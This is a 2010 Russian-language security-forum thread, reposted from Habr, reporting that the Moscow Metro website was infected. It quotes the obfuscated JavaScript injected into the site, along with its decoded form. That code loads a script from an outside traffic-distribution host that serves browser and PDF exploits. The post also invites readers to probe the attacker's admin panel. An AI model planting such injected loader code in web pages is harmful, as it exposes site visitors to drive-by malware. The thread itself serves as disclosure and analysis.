ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Официальный сайт Московского метрополитена затроянили |
16.01.2010, 14:25
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Официальный сайт Московского метрополитена затроянили
Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку Javascript кода:
Код:
<script language="javascript" src="/script.js"></script>
Смотрим последнюю строку злополучного файла:
Код:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);
После выполнения данного участка на странице происходит добавление ещё одного сценария, но уже по внешней ссылке:
Код:
<script src="http://thetraf.net/tds/in.cgi?default"></script>
Которая после нескольких редиректов подбрасывает браузеру подходящий JS код эксплойта, использующий ту или иную актуальную уязвимость. Под Opera for Windows, например, самопроизвольно открывается вредоносный PDF файл, хотя интеграция PDF вьювера от Adobe Reader с браузером отключена.
Для желающих покопаться в коде, вот образец JS кода и образец PDF документа. Антивирус Касперского полученный PDF детектирует как Exploit.Win32.Pidief.cyk. Остальные антивирусные продукты почти поголовно молчат — отчет VirusTotal: http://ow.ly/X63u.
По данным DomainTools и WebHosting.info к данному хосту (размещённому, естественно в Китае) привязано ещё несколько доменов, предположительно для аналогичных целей.
P.S. Кстати, по адресу thetraf.net/tds/admin/ находится запароленный вход в админку Sutra TDS (TDS — traffic distribution system — система распределения траффика), если кто сможет дёрнуть оттуда какие-нибудь подробности. 
© Habr.
Последний раз редактировалось root_sashok; 16.01.2010 в 14:29..
|
|
|
16.01.2010, 14:29
|
|
Участник форума
Регистрация: 05.06.2009
Сообщений: 225
Провел на форуме:
2793173
Репутация:
297
|
|
на пару сайтах уже встречался мне Exploit.Win32.Pidief.cyk
Последний раз редактировалось winlogon.exe; 16.01.2010 в 14:31..
|
|
|
|
16.01.2010, 14:29
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
15123588
Репутация:
299
|
|
nod32 не молчит.
|
|
|
|
16.01.2010, 14:30
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Что интересно — такое уже встречалось в сети, только на главной висела гифка, обращающаяся к JS, который уже использовал уязвимость Adobe Reader (если он, конечно, был установлен).
|
|
|
|
16.01.2010, 14:45
|
|
Участник форума
Регистрация: 05.01.2010
Сообщений: 127
Провел на форуме:
587522
Репутация:
61
|
|
У меня NOD32 молча заблочил опасное соединение, и послал всё это на...
Это лучше чем орать на всю комнату, как Касперски, "Галактеко опасносте!!!1один"
|
|
|
|
16.01.2010, 14:46
|
|
Участник форума
Регистрация: 05.06.2009
Сообщений: 225
Провел на форуме:
2793173
Репутация:
297
|
|
Сообщение от CPU0
У меня NOD32 молча заблочил опасное соединение, и послал всё это на...
Это лучше чем орать на всю комнату, как Касперски, "Галактеко опасносте!!!1один"
звуковое сопровождение можно отключить если ты не знал
|
|
|
|
16.01.2010, 14:49
|
|
Участник форума
Регистрация: 05.01.2010
Сообщений: 127
Провел на форуме:
587522
Репутация:
61
|
|
Сообщение от winlogon.exe
звуковое сопровождение можно отключить если ты не знал
Я им(Касперским) никогда не пользовался,и не буду
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
